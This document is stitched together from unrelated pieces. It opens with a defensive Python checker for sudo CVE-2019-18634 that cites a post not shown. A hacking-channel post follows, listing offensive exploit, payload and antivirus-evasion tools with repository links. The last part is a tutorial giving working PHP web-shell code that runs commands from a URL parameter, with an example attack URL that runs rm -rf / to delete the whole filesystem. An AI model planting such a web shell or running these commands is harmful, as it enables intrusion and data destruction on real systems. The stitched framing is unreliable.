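As an added defender's check (not from the original post), the Python below decides whether a given sudo version and sudoers text are exposed to CVE-2019-18634 using only the facts stated above: pwfeedback must be enabled, 1.8.31 carries the fix, and the 1.8.26 to 1.8.30 releases contain the logic error but are not exploitable. The sudoers snippets are constructed samples, the function names are this example's own, and the version bounds are the post's, not a complete advisory matrix.

```python
import re


def parse_version(version):
    """'1.8.25p1' -> (1, 8, 25, 1); a missing patch level counts as 0."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)(?:p(\d+))?$", version.strip())
    if not m:
        raise ValueError("unrecognised sudo version: %r" % version)
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def pwfeedback_enabled(sudoers_text):
    """Walk Defaults lines in order; the last pwfeedback / !pwfeedback seen wins.

    Simplification: 'Defaults:user' and 'Defaults@host' scoped lines are treated
    like global Defaults, which errs on the side of reporting exposure.
    """
    enabled = False
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line.startswith("Defaults"):
            continue
        parts = line.split(None, 1)              # 'Defaults', then a comma list of options
        body = parts[1] if len(parts) > 1 else ""
        for opt in (o.strip() for o in body.split(",")):
            if opt == "pwfeedback":
                enabled = True
            elif opt == "!pwfeedback":
                enabled = False
    return enabled


def exposed_to_cve_2019_18634(version, sudoers_text):
    """Return (exposed, reason) from the conditions described in the post."""
    if not pwfeedback_enabled(sudoers_text):
        return (False, "pwfeedback not enabled")
    v = parse_version(version)
    if v >= (1, 8, 31, 0):
        return (False, "fixed in 1.8.31")
    if (1, 8, 26, 0) <= v <= (1, 8, 30, 99):
        return (False, "logic error present but not exploitable (EOF handling change in 1.8.26)")
    return (True, "pwfeedback enabled on sudo %s" % version)


# Constructed sudoers samples: one with the option on, one with the post's fix applied
SUDOERS_ENABLED = """\
# /etc/sudoers (constructed sample)
Defaults env_reset,pwfeedback
root ALL=(ALL:ALL) ALL
"""
SUDOERS_FIXED = SUDOERS_ENABLED.replace("pwfeedback", "!pwfeedback")
```

On a real host feed it the output of `sudo -V | head -1` (version) and `sudo cat /etc/sudoers` together with the files under /etc/sudoers.d; some distributions (Linux Mint and elementary OS among them) ship pwfeedback enabled by default, so the file check matters more than the distribution name.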

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 TOP EXTREMELY DANGEROUS HACKING TOOLS / accounts-cards-modding... TERMUX-KALI-PARROT...

> EXPLOIT TOOLS 2019-2020
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋:

1) WinRAR Remote Code Execution Proof of Concept exploit for CVE-2018-20250. https://github.com/WyAtu/CVE-2018-20250

2) Composite Moniker Proof of Concept exploit for CVE-2017-8570. https://github.com/rxwx/CVE-2017-8570

3) Exploit toolkit CVE-2017-8759 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft .NET Framework RCE. https://github.com/bhdresh/CVE-2017-8759

4) CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum. https://github.com/unamer/CVE-2017-11882

5) Adobe Flash Exploit CVE-2018-4878. https://github.com/anbai-inc/CVE-2018-4878

6) Exploit toolkit CVE-2017-0199 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. https://github.com/bhdresh/CVE-2017-0199

7) demiguise is a HTA encryption tool for RedTeams. https://github.com/nccgroup/demiguise

8) Office-DDE-Payloads: collection of scripts and templates to generate Office documents embedded with the DDE, macro-less command execution technique. https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads

9) CACTUSTORCH: Payload Generation for Adversary Simulations. https://github.com/mdsecactivebreach/CACTUSTORCH

10) SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. https://github.com/mdsecactivebreach/SharpShooter

11) Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. https://github.com/Mr-Un1k0d3r/DKMC

12) Malicious Macro Generator Utility: simple utility designed to generate obfuscated macros that also include an AV / sandbox escape mechanism. https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator

13) SCT Obfuscator: Cobalt Strike SCT payload obfuscator. https://github.com/Mr-Un1k0d3r/SCT-obfuscator

14) Invoke-Obfuscation: PowerShell Obfuscator. https://github.com/danielbohannon/Invoke-Obfuscation

15) Invoke-CradleCrafter: PowerShell remote download cradle generator and obfuscator. https://github.com/danielbohannon/Invoke-CradleCrafter

16) Invoke-DOSfuscation: cmd.exe Command Obfuscation Generator & Detection Test Harness. https://github.com/danielbohannon/Invoke-DOSfuscation

17) morphHTA: Morphing Cobalt Strike's evil.HTA. https://github.com/vysec/morphHTA

18) Unicorn is a simple tool for using a PowerShell downgrade attack and injecting shellcode straight into memory. https://github.com/trustedsec/unicorn

U S E FOR Learning Only !!!!
@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Hacking an Ubuntu Linux system with PHP:
instagram.com/UnderCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋:

> In this practical scenario, we will give you basic information on how PHP can be used to disrupt a Linux system.
> We will not target any victim. If you want to try it out, you can install LAMPP on your local computer.

1) PHP comes with two functions that can be used to execute Linux commands: exec() and shell_exec(). The function exec() returns the last line of the command output, while shell_exec() returns the entire result of the command as a string.

2) For demonstration purposes, let us assume that the attacker (or an administrator) uploads the following file to a web server.

<?php
$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';
echo "execute a shell command:-> $cmd </br>";
$output = shell_exec($cmd);
echo "<pre>$output</pre>";
?>

The script above takes the command from the GET variable named cmd. The command is executed using shell_exec() and the result is returned to the browser. You can use the above code with the following URL:
http://localhost/cp/konsole.php?cmd=ls%20-l


3) "...konsole.php?cmd=ls%20-l" assigns the value ls -l to the variable cmd.
The command executed on the server will be

4) See the picture by UndercODE

> The above command only shows the files and permissions in the current directory.
Assuming the attacker passes the command

rm -rf /

here,
"rm" deletes files
"-rf" makes rm run recursively and forcibly, deleting all folders and files
"/" tells the command to start deleting from the root directory
The attack URL looks like this:
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁